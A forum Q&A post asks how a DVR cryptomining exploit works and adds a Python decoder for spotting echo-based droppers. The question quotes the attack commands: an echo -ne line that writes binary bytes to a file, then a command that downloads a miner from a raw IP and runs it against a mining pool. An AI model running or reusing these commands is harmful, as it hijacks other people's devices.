
I read this article about an exploit which hijacks a DVR to become a "bitcoin mining bot".

The heart of the attack is to send a binary using just echo commands to the device, which acts as a trivial wget (the device does not have any wget on its own):

echo -ne '\x00\x00\x00\x2f\x00\x00\x00\x1a\x00\x00 \x00\x00\x00\x00\x00\x05\x00\x00\x00\x00 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00 \x00\x31\x00\x00\x00\x00\x00 \x00\x00\x2a\x00\x00\x00\x1b\x00\x00\x00 \x14\x00\x00\x00' >> /var/run/rand0-btcminer-arm

This binary is then used to get the bitcoin mining sw itself:

./rand0-btcminer-arm http://107.178.66.153/btcminer-arm && \
chmod u+x btcminer-arm && ./btcminer-arm -B -o \
stratum+tcp://204.124.183.242:3333 -t 4 -q && echo -ne '\x64\x6f\x6e\x65'

Can somebody please explain what exactly the echo command does, and how that works? Can a few bytes really represent a working "wget"?

Martin Vegter
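As an added example, not from the question, the answer or the linked article: a Python decoder that reproduces what bash's builtin `echo -ne` writes (bash escape semantics are assumed), so a command like the one quoted above can be inspected instead of run. Applied to the question's string it yields 56 bytes (51 from escapes plus 5 literal spaces) that do not start with an ELF header, which fits `>>` appending one chunk of a longer file; the detection helper and the command lines it is tested with are constructed for illustration.

```python
import re

ELF_MAGIC = b"\x7fELF"
_SIMPLE = {"a": 7, "b": 8, "e": 27, "f": 12, "n": 10, "r": 13, "t": 9, "v": 11, "\\": 92}

# The echo argument quoted in the question, copied as printed (spaces inside the quotes are written by echo as 0x20 bytes).
SAMPLE_ECHO_ARG = (
    r"\x00\x00\x00\x2f\x00\x00\x00\x1a\x00\x00 \x00\x00\x00\x00\x00\x05\x00\x00\x00\x00 "
    r"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00 \x00\x31\x00\x00\x00\x00\x00 "
    r"\x00\x00\x2a\x00\x00\x00\x1b\x00\x00\x00 \x14\x00\x00\x00"
)

def decode_echo_ne(arg: str) -> bytes:
    """Bytes that bash's builtin `echo -ne 'arg'` writes (bash semantics assumed):
    \\xHH (1-2 hex digits), \\0NNN (0-3 octal digits) and single-letter escapes.
    An unknown escape keeps its backslash, as bash does."""
    out, i = bytearray(), 0
    while i < len(arg):
        if arg[i] != "\\" or i + 1 == len(arg):
            out += arg[i].encode("latin-1")      # ordinary character, spaces included
            i += 1
            continue
        nxt = arg[i + 1]
        if nxt == "x" and (m := re.match(r"[0-9A-Fa-f]{1,2}", arg[i + 2:])):
            out.append(int(m.group(), 16))
            i += 2 + len(m.group())
        elif nxt == "0":
            m = re.match(r"[0-7]{0,3}", arg[i + 2:])
            out.append(int(m.group() or "0", 8) & 0xFF)
            i += 2 + len(m.group())
        elif nxt in _SIMPLE:
            out.append(_SIMPLE[nxt])
            i += 2
        else:
            out += b"\\"                         # literal backslash; next char handled normally
            i += 1
    return bytes(out)

def describe_chunk(data: bytes) -> dict:
    """Length, NUL count and whether the chunk opens with an ELF header."""
    return {"length": len(data), "nul_bytes": data.count(0),
            "starts_with_elf": data.startswith(ELF_MAGIC)}

ECHO_TO_FILE = re.compile(r"echo\s+-ne\s+'([^']*)'\s*>>?\s*(\S+)")

def flag_echo_droppers(lines):
    """Detection helper: (target path, decoded-chunk summary) for each command line that writes an echo -ne payload to a file."""
    return [(m.group(2), describe_chunk(decode_echo_ne(m.group(1))))
            for m in map(ECHO_TO_FILE.search, lines) if m]
```

A dropper assembled this way shows up as many such appends to one path; only the concatenated file is worth checking for an ELF header.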

1 Answer


The echo is a shellcode that gets executed on the DVR. It stores a little file that is a program acting like wget. This program then gets called to fetch another one (the mining program) that gets executed.

Sorry, I was mistaken. As pointed out in the comments, please look at this thread: A tiny version of wget (51 bytes?)

Corneliux